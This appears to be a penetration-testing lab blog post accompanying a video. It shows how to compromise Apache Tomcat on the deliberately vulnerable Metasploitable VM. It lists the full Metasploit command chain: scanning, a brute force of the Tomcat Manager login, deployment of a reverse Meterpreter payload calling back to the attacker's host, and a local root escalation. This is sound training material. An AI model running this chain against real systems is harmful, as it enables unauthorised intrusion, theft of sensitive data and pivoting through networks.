• Tweet
• Sumo

• Tweet

This video demonstrates how to exploit the Apache tomcat service on Metasploitable. Metasploitable is another vulnerable VM designed to practice penetration testing.

In this video, I will show you how to scan the system, find one of the vulnerable services "Apache Tomcat" and then exploit the service to gain root access.

Steps

• Use Netdiscover to get the IP address of our target (Reconnaisance)
• Use Nmap to do a detailed scan of the target (Information Gathering)
• Use Metasploit to brute force the Apache Tomcat Manager login (Gaining Access)
• Use Metasploit to upload and execute the payload (Remote Access)
• Use Metasploit to gain root privileges (Privilege Escalation)

Commands

ifconfig
netdiscover -r 192.168.61.0/24
nmap -T Aggressive -sV -v 192.168.61.133
msfconsole
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.61.133
set RPORT 8180
exploit
search tomcat
use exploit/multi/http/tomcat_mgr_deploy
set USERNAME tomcat
set PASSWORD tomcat
set RHOST 192.168.61.133
set RPORT 8180
set payload java/meterpreter/reverse_http
set LHOST 192.168.61.128
set target 1
exploit
use exploit/linux/local/udev_netlink
sessions -i
set SESSION 1
exploit
id
whoami

Notes

• Song – Bucie feat Heavy K – Easy to Love
• Video Length – 8minutes

Conclusion

At the end of it all, we were able to get a remote root shell from a vulnerable Apache Tomcat service. In a real world pentest scenario, we would try to explore the machine and retrieve as much sensitive information as possible. We could even use this machine to pivot into the entire Network.

Kindly use the comment box below for feedbacks

– InfosecShinobi